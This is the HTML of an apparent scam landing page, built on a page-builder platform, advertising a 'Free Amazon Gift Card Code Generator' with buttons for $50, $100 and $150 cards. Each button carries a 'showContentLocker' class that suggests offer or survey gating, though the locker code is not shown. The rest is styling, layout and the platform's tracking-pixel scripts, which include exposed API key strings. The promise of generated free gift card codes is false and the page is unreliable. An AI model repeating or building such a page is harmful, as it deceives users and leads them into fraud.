
<!DOCTYPE html>
<!--
Using API Key: 57c9c2df0881ce199e3c | ItToken: 698464
-->
<html><head>
    <title>Amazon Gift Cards | Free Amazon Gift Card Code</title>
<meta name="description" content="UPDATED Free Amazon Gift Card Code brings you the latest amazon gift card code generator online, we have worked very hard to develop the latest tool in code generation online step inside and get your Free Amazon Gift Card Codes now" />
<meta property="og:title" content="Amazon Gift Cards | Free Amazon Gift Card Code" />
<meta property="og:description" content="UPDATED Free Amazon Gift Card Code brings you the latest amazon gift card code generator online, we have worked very hard to develop the latest tool in code generation online step inside and get your Free Amazon Gift Card Codes now" />
<meta name="referrer" content="no-referrer">

<!-- Analytics -->
<script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');


    
    ga('send', 'pageview');

</script>
    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>

<!DOCTYPE html>
<html>

	
	<head>
											<meta name="robots" content="noindex, nofollow" />
				<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
		<meta http-equiv="content-type" content="text/html; charset=utf-8" />

					<title>Amazon Gift Cards | Free Amazon Gift Card Code</title>
		
		<meta name="description" content="UPDATED Free Amazon Gift Card Code brings you the latest amazon gift card code generator online, we have worked very hard to develop the latest tool in code" />
		<meta name="keywords" content="amazon com gift card,amazon e gift card,amazon email gift card,amazon gc,amazon gift card,amazon gift card code,amazon gift card code free,amazon gift card code generator,amazon gift card codes,amazon gift card deal,amazon gift card deals,amazon gift card discount,amazon gift card generator,amazon gift card promotion,amazon gift card redeem,amazon gift card survey,amazon gift cards & promotional codes,amazon gift cards where to buy,amazon gift certificate,amazon gift code,amazon gift coupons,amazon gift voucher,amazon gift voucher code,amazon giftcards,amazon in gift card,amazon redeem gift,amazon redeem gift card,amazon rewards,earn free gift cards,free amazon,free amazon gift card,free amazon gift card code,free amazon gift card code generator,free amazon gift card codes,free amazon gift card no surveys,free gift card generator,free gift cards,free giftcards,get free gift cards,gift card amazon,gift card for amazon,gift card free,gift cards for free,how to get amazon gift cards,how to get free amazon gift cards,how to get free gift cards,how to use amazon gift card,redeem amazon gift card,sell amazon gift card,send amazon gift card,where can i buy amazon gift cards,where can i buy an amazon gift card,win amazon gift card" />

		
		<meta property="og:locale" content="en_US" />
		<meta property="og:type" content="article" />
		<meta property="og:title" content="Amazon Gift Cards | Free Amazon Gift Card Code" />
		<meta property="og:description" content="UPDATED Free Amazon Gift Card Code brings you the latest amazon gift card code generator online, we have worked very hard to develop the latest tool in code" />
		<meta property="og:site_name" content="Amazon Gift Cards | Free Amazon Gift Card Code" />
					 <meta property="og:url" content="http://amazongiftgen.pagedemo.co" />
		
									
				<meta property="og:image" content="http://storage.googleapis.com/instapage-user-media/b2744156/13421163-0-GC-logo-cllb.jpg" />
				<meta property="og:image:secure_url" content="https://storage.googleapis.com/instapage-user-media/b2744156/13421163-0-GC-logo-cllb.jpg" />
							
				<meta property="og:image" content="http://storage.googleapis.com/instapage-user-media/b2744156/13421213-0-rsz-amazon.png" />
				<meta property="og:image:secure_url" content="https://storage.googleapis.com/instapage-user-media/b2744156/13421213-0-rsz-amazon.png" />
							
				<meta property="og:image" content="http://storage.googleapis.com/instapage-user-media/b2744156/13421408-0-rsz-1rsz-title.png" />
				<meta property="og:image:secure_url" content="https://storage.googleapis.com/instapage-user-media/b2744156/13421408-0-rsz-1rsz-title.png" />
					
					<!-- font injector --> 
		<link type="text/css" rel="stylesheet" media="screen, print" href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" /><!-- end -->
			<style type="text/css" media="screen">
				.page-element .btn,
				.page-element .contents,
				.page-element.widget-form form,
				.page-element.widget-form form input,
				.page-element.widget-form form textarea,
				.page-element.widget-form form select,
				.page-element.widget-form form label
				{
																	font-family: Open Sans;
												font-weight: inherit;
															}

				.page-element.widget-headline .contents h1,
				.page-element.widget-headline .contents h2,
				.page-element.widget-headline .contents h3,
				.page-element.widget-headline .contents h4,
				.page-element.widget-headline .contents h5,
				.page-element.widget-headline .contents h6
				{
																	font-family: Open Sans;
												font-weight: inherit;
															}

				[id^=___plusone] { width:51px !important; }

				div.social.lines [id^=___plusone] { width:62px !important; }
				div.social.lines span[class^=IN-widget] { min-width:70px !important; }
				div.social.buttons [id^=___plusone] { width:36px !important; }
				div.social.buttons div[class^=fb-like] { width:58px !important; }
				div.social.tiles [id^=___plusone] { height:63px !important; margin-top: 2px !important; }
				div.social.tiles .fb-like iframe { margin-top: 1px !important; }

				.widget-testimonial.style-1 .contents div.testimonial-text
				{
					margin-top: 0;
				}

				@media screen and (max-width: 768px)
				{
					.notification > .notification-inner
					{
						width: auto;
						position: fixed;
						top: 40%;
						left: 1em !important;
						right: 1em !important;
						font-size: 24px;
					}
				}

				
				/* Safari only fix */
				@media screen and (min-color-index:0) and(-webkit-min-device-pixel-ratio:0) {
				{
					.widget-form .select-outer select
					{
						padding-left: 10px;
					}

					.widget-form.mobile-form .select-outer select
					{
						padding-left: 10px;
					}
				}}

				
							</style>
		
		
				
<link rel="stylesheet" type="text/css" href="//storage.googleapis.com/instapage-app-assets/433/031a761e2b05d2bed213fd1f07412755.css" media="screen"  />

<script type="text/javascript" src="//storage.googleapis.com/instapage-app-assets/433/a5cb880a745154a6a1a45f3465215dfd.js"></script>



					<meta name="viewport" content="width=device-width, initial-scale=1.0" id="mobile-viewport">
		
		<script type="text/javascript" class="instapage-noscrap">var ijQuery = jQuery.noConflict(true);</script>
		<script type="text/javascript" class="instapage-noscrap">
			var $ = ijQuery;
			var jQuery = ijQuery;
			window.__page_id = 4908498;
			window.__version = 8;
			window.__variant = 'A';
			window.__is_tablet = false;
			window.__page_domain = '//amazongiftgen.pagedemo.co';
			window.__instapage_services = '//app.instapage.com';
			window.__instapage_proxy_services = 'PROXY_SERVICES';
			window.__preview = false;
			window.__facebook = false;
			window.__page_type = 2;
			window.__mobile_version = 2;
			
			
			var page_version = 8;

			var _Translate = new Translate();

			if( ijQuery === 'undefined' )
			{
				var ijQuery = jQuery;
			}

			ijQuery(document).ready(function()
			{
				window._Mobile_helper = new MobileHelper();
				window._Mobile_helper.initViewport( 960, true );

				try
				{
					ijQuery('input, textarea').placeholder();
				}
				catch( e )
				{
				}
			});

			ijQuery( window ).load( function()
			{
				var notification_loader;

								ijQuery( 'body' ).hide().show();

								notification_loader = ijQuery( '.notification-loader' );
				notification_loader.attr( 'src', notification_loader.attr( 'rel' ) );
			});

			_Translate.set( "Problem loading google map", "Problem loading google map" );

			is_new_mobile_visible = function()
			{
				if( !window.matchMedia )
				{
					return false;
				}
				return window.matchMedia('screen and (max-width: 620px), screen and (max-width: 999px) and (-webkit-min-device-pixel-ratio: 1.5)').matches;
			}
		</script>

		
				
		
					
						<style type="text/css">
				html
				{
					height: 100%;
				};
			</style>
			<script type="text/javascript" >

				setTimeout(function()
				{
					"use strict";
					try
					{
						var body = document.body;
						var html = document.documentElement;
						var height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight );

						html.style.setProperty( 'height', height + 'px' );
					}
					catch( e )
					{
					}
				}, 1 );
			</script>
			
			<style type="text/css">
				body
				{
					background-color: #ffffff;
					
																		background-position: top left;
											
					background-repeat: repeat;
																		background-size: cover;
													-webkit-background-size: cover;
													-moz-background-size: cover;
													-o-background-size: cover;
											
				}

				
				.page .page-block .block-inner { background-color: transparent; }
			</style>
		
		<style type="text/css">
			
	
#element-2  
{
	height: 38px;
	width: 38px;
	left: 0px;
	top: 1px;
	z-index: 3;
}
	
#element-3  
{
	height: 25px;
	width: 370px;
	left: 40px;
	top: 12px;
	z-index: 4;
}

#element-3 p, #element-3 ul, #element-3 ol, #element-3 h1 
{
	font-size: 18px;
	color: rgb(162, 162, 162);
	line-height: 25px;
	text-align: left;
}
	
#element-6  
{
	height: 180px;
	width: 635px;
	left: 163px;
	top: 48px;
	z-index: 5;
}
	
#element-7  
{
	height: 274px;
	width: 413px;
	left: 0px;
	top: 349px;
	z-index: 6;
}
	
#element-5  
{
	height: 50px;
	width: 309px;
	left: 523px;
	top: 408px;
	z-index: 7;
}
	
#element-8  
{
	height: 50px;
	width: 422px;
	left: 480px;
	top: 327px;
	z-index: 8;
}

#element-8 p, #element-8 ul, #element-8 ol, #element-8 h1 
{
	font-size: 36px;
	color: rgb(0, 0, 0);
	line-height: 50px;
	text-align: left;
}
	
#element-9  
{
	height: 50px;
	width: 311px;
	left: 523px;
	top: 489px;
	z-index: 9;
}
	
#element-10  
{
	height: 50px;
	width: 315px;
	left: 522px;
	top: 572px;
	z-index: 10;
}
	
#element-12  
{
	height: 143px;
	width: 340px;
	left: 310px;
	top: 746px;
	z-index: 11;
}
	
#element-14  
{
	height: 22px;
	width: 370px;
	left: 295px;
	top: 27px;
	z-index: 12;
}

#element-14 p, #element-14 ul, #element-14 ol, #element-14 h1 
{
	font-size: 16px;
	color: rgb(175, 175, 175);
	line-height: 22px;
	text-align: left;
}

			
#page_block_header { height: 52px; }

#page_block_header .border-holder
{
			background-image: none;
	
			background-color: #000000;
	
	background-repeat: repeat;						background-position: top left;
			
										background-size:cover;
							-webkit-background-size:cover;
							-moz-background-size:cover;
							-o-background-size:cover;
						
		
		width: auto;
		border-width: 0;
		border-top-width: 0px;
		border-bottom-width: 0px;

	
	height: 52px;

	}

@media only screen and (max-width: 770px) {
	.border-holder {
		background-attachment: scroll !important;
	}
}

#page_block_header .color-overlay
{
	}

	#page_block_header .block-inner
	{
		margin-top: 0px;
			}

			
#page_block_below_fold { height: 911px; }

#page_block_below_fold .border-holder
{
			background-image: none;
	
			background-color: #ffffff;
	
	background-repeat: repeat;						background-position: top left;
			
										background-size:cover;
							-webkit-background-size:cover;
							-moz-background-size:cover;
							-o-background-size:cover;
						
		
		width: auto;
		border-width: 0;
		border-top-width: 0px;
		border-bottom-width: 0px;

	
	height: 911px;

	}

@media only screen and (max-width: 770px) {
	.border-holder {
		background-attachment: scroll !important;
	}
}

#page_block_below_fold .color-overlay
{
	}

	#page_block_below_fold .block-inner
	{
		margin-top: 0px;
			}

			
#page_block_footer { height: 71px; }

#page_block_footer .border-holder
{
			background-image: none;
	
			background-color: #393939;
	
	background-repeat: repeat;						background-position: top left;
			
										background-size:cover;
							-webkit-background-size:cover;
							-moz-background-size:cover;
							-o-background-size:cover;
						
		
		width: auto;
		border-width: 0;
		border-top-width: 0px;
		border-bottom-width: 0px;

	
	height: 71px;

	}

@media only screen and (max-width: 770px) {
	.border-holder {
		background-attachment: scroll !important;
	}
}

#page_block_footer .color-overlay
{
	}

	#page_block_footer .block-inner
	{
		margin-top: 0px;
			}

	
@media
screen and (max-width: 620px),
screen and (max-width: 999px) and (-webkit-min-device-pixel-ratio: 1.5) and ( max-device-width: 1280px ) and (max-device-height: 720px),
screen and (max-width: 999px) and (-webkit-min-device-pixel-ratio: 1.5) and ( max-device-width: 1000px )
{
	body
	{
		min-width: 400px;
		width: 100%;
	}
	.page.page2
	{
		width: 100%;
	}
	.page.page2 .block-inner
	{
		width: 400px;
		margin: 0 auto;
	}
	.page.page2.new-mobile-preview .block-inner
	{
		width: auto;
	}


		.widget-form .field-checkbox .field-element label:before,
	.widget-form .field-radio .field-element label:before
	{
		top: 16px;
	}
	.widget-form .field-checkbox .field-element label:after
	{
		top: 21px;
	}

	.widget-form .field-radio .field-element label:after
	{
		top: 16px;
	}

	.widget-form .select-outer
	{
		overflow: hidden;
		margin-bottom: 8px;
		margin-top: 8px;
		-webkit-border-radius: 2px;
		border-radius: 2px;
	}

	.widget-form .select-outer select
	{
		width: calc( 100% - 1px );
		height: 56px;
		border: 0;
		margin: 0;
		-webkit-appearance: none;
		line-height: 30px;
		border-style: solid;
		border-width: 1px;
		background-image: url( '//storage.googleapis.com/instapage-app-assets/433/img/builder2/select-arrow-drop-down.png' );
		background-position: right;
		background-repeat: no-repeat;
	}
	.widget-form .form-input[type="text"],
	.widget-form .form-input[type="password"],
	.widget-form .form-input[type="email"],
	.widget-form textarea.form-input
	{
		padding-top: 12px;
		padding-bottom: 9px;
		font-size: 20px;
		line-height: 22px;
		height: 56px;
		-webkit-appearance: none;
	}

	.widget-form .label-outside,
	.widget-form .outside-top,
	.widget-form .field-element label
	{
		font-size: 20px;
		line-height: 22px;
		padding-top: 12px;
		padding-bottom: 9px;
	}

	.widget-form select
	{
		font-size: 20px;
		height: 56px;
		padding-left: 9px;
		width: calc( 100% + 2px );
		-moz-padding-start: 5px;
	}

	.widget-form .input-holder.field-checkbox > label.outside-top,
	.widget-form .input-holder.field-radio > label.outside-top,
	.widget-form .field-container.edit.field-checkbox > label.label-outside,
	.widget-form .field-container.edit.field-radio > label.label-outside
	{
		margin-top: 8px;
		margin-bottom: 2px;
	}

	.widget-form .form-option-element label,
	.widget-form .field-element label
	{
		font-size: 20px;
		line-height: 22px;
		padding-bottom: 0;
		margin-bottom: 0px;
	}

	.new_mobile .widget-form textarea.form-input.shortnice
	{
		height: 56px;
	}

						
#element-2  
{
	height: 38px;
	width: 38px;
	left: 181px;
	top: 40px;
	z-index: 3;
}
					
#element-3  
{
	height: 20px;
	width: 360px;
	left: 20px;
	top: 108px;
	z-index: 4;
}

#element-3 p, #element-3 ul, #element-3 ol, #element-3 h1 
{
	font-size: 18px;
	color: rgb(162, 162, 162);
	line-height: 20px;
	text-align: left;
}
					
#element-6  
{
	height: 102px;
	width: 360px;
	left: 20px;
	top: 40px;
	z-index: 5;
}
					
#element-7  
{
	height: 212px;
	width: 318px;
	left: 40px;
	top: 172px;
	z-index: 6;
}
					
#element-5  
{
	height: 48px;
	width: 315px;
	left: 41px;
	top: 495px;
	z-index: 7;
}
					
#element-8  
{
	height: 32px;
	width: 360px;
	left: 20px;
	top: 414px;
	z-index: 8;
}

#element-8 p, #element-8 ul, #element-8 ol, #element-8 h1 
{
	font-size: 25px;
	color: rgb(0, 0, 0);
	line-height: 32px;
	text-align: left;
}
					
#element-9  
{
	height: 50px;
	width: 311px;
	left: 44px;
	top: 576px;
	z-index: 9;
}
					
#element-10  
{
	height: 50px;
	width: 315px;
	left: 43px;
	top: 656px;
	z-index: 10;
}
					
#element-12  
{
	height: 143px;
	width: 340px;
	left: 30px;
	top: 736px;
	z-index: 11;
}
					
#element-14  
{
	height: 18px;
	width: 360px;
	left: 20px;
	top: 40px;
	z-index: 12;
}

#element-14 p, #element-14 ul, #element-14 ol, #element-14 h1 
{
	font-size: 16px;
	color: rgb(175, 175, 175);
	line-height: 19px;
	text-align: left;
}
			
						
#page_block_header { height: 163px; }

#page_block_header .border-holder
{
			background-image: none;
	
			background-color: #000000;
	
	background-repeat: repeat;						background-position: top left;
			
										background-size:cover;
							-webkit-background-size:cover;
							-moz-background-size:cover;
							-o-background-size:cover;
						
		
		width: auto;
		border-width: 0;
		border-top-width: 0px;
		border-bottom-width: 0px;

	
	height: 163px;

	}

@media only screen and (max-width: 770px) {
	.border-holder {
		background-attachment: scroll !important;
	}
}

#page_block_header .color-overlay
{
	}

	#page_block_header .block-inner
	{
		margin-top: 0px;
			}

					
#page_block_below_fold { height: 945px; }

#page_block_below_fold .border-holder
{
			background-image: none;
	
			background-color: #ffffff;
	
	background-repeat: repeat;						background-position: top left;
			
										background-size:cover;
							-webkit-background-size:cover;
							-moz-background-size:cover;
							-o-background-size:cover;
						
		
		width: auto;
		border-width: 0;
		border-top-width: 0px;
		border-bottom-width: 0px;

	
	height: 945px;

	}

@media only screen and (max-width: 770px) {
	.border-holder {
		background-attachment: scroll !important;
	}
}

#page_block_below_fold .color-overlay
{
	}

	#page_block_below_fold .block-inner
	{
		margin-top: 0px;
			}

					
#page_block_footer { height: 93px; }

#page_block_footer .border-holder
{
			background-image: none;
	
			background-color: #393939;
	
	background-repeat: repeat;						background-position: top left;
			
										background-size:cover;
							-webkit-background-size:cover;
							-moz-background-size:cover;
							-o-background-size:cover;
						
		
		width: auto;
		border-width: 0;
		border-top-width: 0px;
		border-bottom-width: 0px;

	
	height: 93px;

	}

@media only screen and (max-width: 770px) {
	.border-holder {
		background-attachment: scroll !important;
	}
}

#page_block_footer .color-overlay
{
	}

	#page_block_footer .block-inner
	{
		margin-top: 0px;
			}

			}

@media
screen and (min-width: 621px)  and (-webkit-max-device-pixel-ratio: 1.5),
screen and (min-width: 1000px) and (-webkit-max-device-pixel-ratio: 1.5)
{
	.new_mobile .page.page2.mobile .block-inner
	{
		width: 960px;
	}
}
		</style>

							
		
				
												
			
					
	</head>

	
	<body class=" new_mobile">

		
		
		
				<div id="i-page" class="page page2 ">
			<div class="notification">
				<div class="notification-overlay"></div>
				<div class="notification-inner">
					<img rel="//storage.googleapis.com/instapage-app-assets/img/loading_circle.svg" src="" class="loading notification-loader" alt="" />
					<span class="message"></span>
					<span class="close-button" onclick="jQuery(this).parent().parent().hide()">Close</span>
				</div>
			</div>

												<div class="page-block" id="page_block_header">
						<div class="color-overlay"></div>
						<div class="border-holder">
							<div class="block-inner">
																											<div
	class="page-element widget-container page-element-type-image widget-image "
	id="element-2"
	>

	
<div class="contents">
						<img
				src="//storage.googleapis.com/instapage-user-media/b2744156/13420723-0-gift-512.png"
									style="height: 100%; width: 100%; margin-top: 0px;"
								alt=""
			/>
		
	</div>
</div>

																													<div
	class="page-element widget-container page-element-type-text widget-text "
	id="element-3"
	>

	<div class="contents"><p style=" "><font color="#a2a2a2">Amazon Gift CardGenerator</font></p></div>
</div>

																																		</div>
						</div>
					</div>
									<div class="page-block" id="page_block_below_fold">
						<div class="color-overlay"></div>
						<div class="border-holder">
							<div class="block-inner">
																											<div
	class="page-element widget-container page-element-type-image widget-image "
	id="element-6"
	>

	
<div class="contents">
						<img
				src="//storage.googleapis.com/instapage-user-media/b2744156/13421163-0-GC-logo-cllb.jpg"
									style="height: 100%; width: 100%; margin-top: 0px;"
								alt=""
			/>
		
	</div>
</div>

																													<div
	class="page-element widget-container page-element-type-image widget-image "
	id="element-7"
	>

	
<div class="contents">
						<img
				src="//storage.googleapis.com/instapage-user-media/b2744156/13421213-0-rsz-amazon.png"
									style="height: 100%; width: 100%; margin-top: 0px;"
								alt=""
			/>
		
	</div>
</div>

																													<div
	class="page-element widget-container page-element-type-button widget-button "
	id="element-10"
	>

	<style type="text/css">
	#element-10 .dynamic-button
	{
		background-color: #ff7f18;

					color: #ffffff;
		
		box-sizing: border-box;border: 2px solid #9b9b9b;		
			}

	#element-10 .dynamic-button:active
	{
			}

			#element-10 .dynamic-button:hover
		{
			background-color: #9b9b9b;
		}
	
	
	#element-10 .dynamic-button, #element-10 .image-button
	{
		width: 315px;
		height: 50px;
		z-index: 10;
		line-height: 20px;
		font-size: 17px;
		font-weight: 400;
					font-family: Open Sans;
							border-radius: 5px;		
	}

			@media
		screen and ( max-width: 620px ),
		screen and ( max-width: 999px ) and ( -webkit-min-device-pixel-ratio: 1.5 ) and ( max-device-width: 1280px ) and ( max-device-height: 720px ),
		screen and ( max-width: 999px ) and ( -webkit-min-device-pixel-ratio: 1.5 ) and ( max-device-width: 1000px )
		{
			body:not( .tablet ) #element-10 .dynamic-button, body:not( .tablet ) #element-10 .image-button
			{
				width: 315px;
				height: 50px;
				z-index: 10;
				line-height: 50px;
				font-size: 17px;
			}
		}
	
	</style>
<div class="conversion_wrapper">
	<a
		href=""
				style="width: 315px; height: 50px;"
				data-wid="10"
	>
		
			<div
				class="btn submit-button button_submit dynamic-button  shadow showContentLocker "
			>150$ Gift Card</div>
			</a>
</div>
</div>

																													<div
	class="page-element widget-container page-element-type-button widget-button "
	id="element-5"
	>

	<style type="text/css">
	#element-5 .dynamic-button
	{
		background-color: #ff7f18;

					color: #ffffff;
		
		box-sizing: border-box;border: 2px solid #9b9b9b;		
			}

	#element-5 .dynamic-button:active
	{
			}

			#element-5 .dynamic-button:hover
		{
			background-color: #9b9b9b;
		}
	
	
	#element-5 .dynamic-button, #element-5 .image-button
	{
		width: 309px;
		height: 50px;
		z-index: 7;
		line-height: 20px;
		font-size: 17px;
		font-weight: 400;
					font-family: Open Sans;
							border-radius: 5px;		
	}

			@media
		screen and ( max-width: 620px ),
		screen and ( max-width: 999px ) and ( -webkit-min-device-pixel-ratio: 1.5 ) and ( max-device-width: 1280px ) and ( max-device-height: 720px ),
		screen and ( max-width: 999px ) and ( -webkit-min-device-pixel-ratio: 1.5 ) and ( max-device-width: 1000px )
		{
			body:not( .tablet ) #element-5 .dynamic-button, body:not( .tablet ) #element-5 .image-button
			{
				width: 315px;
				height: 48px;
				z-index: 7;
				line-height: 48px;
				font-size: 16px;
			}
		}
	
	</style>
<div class="conversion_wrapper">
	<a
		href=""
				style="width: 309px; height: 50px;"
				data-wid="5"
	>
		
			<div
				class="btn submit-button button_submit dynamic-button  shadow showContentLocker "
			>50$ Gift Card</div>
			</a>
</div>
</div>

																													<div
	class="page-element widget-container page-element-type-button widget-button "
	id="element-9"
	>

	<style type="text/css">
	#element-9 .dynamic-button
	{
		background-color: #ff7f18;

					color: #ffffff;
		
		box-sizing: border-box;border: 2px solid #9b9b9b;		
			}

	#element-9 .dynamic-button:active
	{
			}

			#element-9 .dynamic-button:hover
		{
			background-color: #9b9b9b;
		}
	
	
	#element-9 .dynamic-button, #element-9 .image-button
	{
		width: 311px;
		height: 50px;
		z-index: 9;
		line-height: 20px;
		font-size: 17px;
		font-weight: 400;
					font-family: Open Sans;
							border-radius: 5px;		
	}

			@media
		screen and ( max-width: 620px ),
		screen and ( max-width: 999px ) and ( -webkit-min-device-pixel-ratio: 1.5 ) and ( max-device-width: 1280px ) and ( max-device-height: 720px ),
		screen and ( max-width: 999px ) and ( -webkit-min-device-pixel-ratio: 1.5 ) and ( max-device-width: 1000px )
		{
			body:not( .tablet ) #element-9 .dynamic-button, body:not( .tablet ) #element-9 .image-button
			{
				width: 311px;
				height: 50px;
				z-index: 9;
				line-height: 50px;
				font-size: 17px;
			}
		}
	
	</style>
<div class="conversion_wrapper">
	<a
		href=""
				style="width: 311px; height: 50px;"
				data-wid="9"
	>
		
			<div
				class="btn submit-button button_submit dynamic-button  shadow showContentLocker  "
			>100$ Gift Card</div>
			</a>
</div>
</div>

																													<div
	class="page-element widget-container page-element-type-headline widget-headline "
	id="element-8"
	>

	
<div class="contents"><h1><p style=" ">Choose your gift card :</p></h1></div>
</div>

																													<div
	class="page-element widget-container page-element-type-image widget-image "
	id="element-12"
	>

	
<div class="contents">
						<img
				src="//storage.googleapis.com/instapage-user-media/b2744156/13421408-0-rsz-1rsz-title.png"
									style="height: 100%; width: 100%; margin-top: 0px;"
								alt=""
			/>
		
	</div>
</div>

																																		</div>
						</div>
					</div>
									<div class="page-block" id="page_block_footer">
						<div class="color-overlay"></div>
						<div class="border-holder">
							<div class="block-inner">
																											<div
	class="page-element widget-container page-element-type-text widget-text "
	id="element-14"
	>

	<div class="contents"><p style=" "><font color="#afafaf">Free Amazon Gift Card Generator © 2017</font></p></div>
</div>

																																		</div>
						</div>
					</div>
									</div>

		
		<div id="fb-root"></div>

		<!-- visitor pixel --><script type="text/javascript" class="instapage-noscrap">
	window.__conversions_settings = {"forms":true,"links":false,"external":false,"changed_by_user":false};
	function iCopyKeenEvent( name, properties )
	{
		var params_copy = window.__keen_io_called_parameters.slice();
		var data = {};
		properties = properties || {};

		for( i in params_copy[ 2 ] )
		{
			if( params_copy[ 2 ].hasOwnProperty( i ) )
			{
				data[ i ] = params_copy[ 2 ][ i ];
			}
		}

		for( i in properties )
		{
			if( properties.hasOwnProperty( i ) )
			{
				data[ i ] = properties[ i ];
			}
		}

		if( name === 'conversion' && window.__unique )
		{
			if( window.__unique.isVisited() )
			{
				data[ 'responsive_mode' ] = window.__unique.isResponsiveMode() ? 'mobile' : null;
			}
		}


		params_copy.splice( 1, 2, name, data );
		return params_copy;
	}

	function iEncodePixelUrl( id, event, data, key )
	{
		var endpoint = "anthill.instapage.com" + '/projects/' + id + '/events/' + event;
		var query = 'api_key=' + key + '&data=' + base64_encode( JSON.stringify( data ) );
		var image_url = '//' + endpoint + '?' + query;

		return image_url;
	}

	function iCreateTrackingPixel( src )
	{
		return ijQuery( '<img>')
			.attr( {
				src: src,
				width: 1,
				height: 1,
				alt: '',
				title: '',
				style: 'display: table-cell; height: 0; position: absolute; left: -9999999px; top: -999999px;'
			} )
	}

	ijQuery( document ).on( 'ready', function()
	{
		var cookie_name = 'instapage-visit-4908498';
		var parameters = {"user_id":1278419,"page_id":4908498,"published_version":8,"quantity":1,"static_page":false,"variation_name":"A","variation_id":1,"linked_variation_id":2,"initial_responsive_mode":null,"visitor_ip":"104.155.159.71","useragent":""};
		var id = '4908498';
		var track_returning_visitors = false;

		var project_id = '56c2f3d796773d0a7e96a536';
		var event = 'visit';
		var key = 'f1058d5b927a12ddc563dd85bc2a63729bf00fdc344b3786d76f13375d89b5c7251079a9f51b614d5f4c59ba2c388005fbc03c83415082e6e7bce9747a6322437ecffc9b6a102bb823bcb980e250dfefed6e63eff4528b66d83b09e45111f358007612bcc1114576c1668c8e06dc7b892070bb236ac60c50aa0f10ac61596889e3463e4bfa6f09c166373762d3f4c727';

		parameters.javascript = true;
		parameters.variation = parameters.variation_name;
		parameters.generation_time = '115';
		parameters.responsive_mode = null;

		if( window.__mobile_version === 2 && window.innerWidth < 600 && window.__variant.indexOf( '-mobile' ) < 0 )
		{
			window.__variant += '-mobile';
			parameters.responsive_mode = 'mobile';
		}
		else if( window.__variant.indexOf( '-mobile' ) > 0 )
		{
			parameters.responsive_mode = 'mobile';
		}

		window.__unique = new InstapageUniqueVisit( cookie_name, {
			variant: parameters.variation_name,
			responsive_mode: parameters.responsive_mode,
			reset: {}		} );

		parameters.visited = window.__unique.isVisited();
		window.__keen_io_called_parameters = [ project_id, event, parameters, key ];
		if( !parameters.visited || track_returning_visitors )
		{
			iCreateTrackingPixel( iEncodePixelUrl( project_id, event, parameters, key ) )
				.appendTo( ijQuery( 'body' ) );

			window.__unique.setResponsiveMode( parameters.responsive_mode );
			window.__unique.setVisited();
			window.__unique.save();
		}

		if( window.__conversions_settings.external && typeof $.cookie( 'instapage.conversion' + id ) === 'undefined' )
		{
			var parameter_pixel = iCopyKeenEvent("conversion", {
				conversion_type: "form"
			});
			var external_image = iEncodePixelUrl.apply( iEncodePixelUrl, parameter_pixel );

			var data = {
				page_id: id,
				variation: parameters.variation_name,
				external_image: external_image,
				timestamp_created: Date.now(),
				timestamp_sent: null
			}

			$.cookie( 'instapage.conversion' + id, JSON.stringify( data ), {
				expires: 7,
				path: '/'
			} );
		}
	} );

</script>
<noscript class="instapage-noscrap">
